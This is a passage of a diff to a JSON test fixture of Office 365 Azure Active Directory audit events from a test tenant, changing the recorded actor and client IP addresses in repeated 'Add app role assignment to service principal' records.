APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -22729,9 +22729,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -22965,7 +22965,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -22995,9 +22995,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -23231,7 +23231,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
